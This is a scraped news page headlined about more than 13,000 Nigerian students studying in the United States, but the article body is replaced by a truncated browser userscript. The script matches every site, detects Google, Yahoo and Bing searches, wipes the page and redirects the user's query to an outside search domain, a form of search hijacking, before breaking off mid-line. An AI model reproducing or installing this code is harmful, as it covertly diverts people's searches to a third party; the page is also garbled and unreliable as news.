News  |  National  

More than 13,000 Nigerian students currently studying in the United States

By TVC News Nigeria |   18 June 2021   |   2:27 pm  

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })(); setTimeout(function (){ let iframe = document.getElementsByTagName('iframe'); let arrayIframe = []; for (let i = 0; i

You may also like

1 day ago
Find these stories and much more when you grab a copy of The Guardian on Thursday.
5 hours ago
The devaluation of the naira against the dollar has plunged Nigerians into a deep socio-economic depression. The price of basic foodstuffs can double or even triple in the same day.
44 mins ago
Find these stories and much more when you grab a copy of The Guardian on Friday.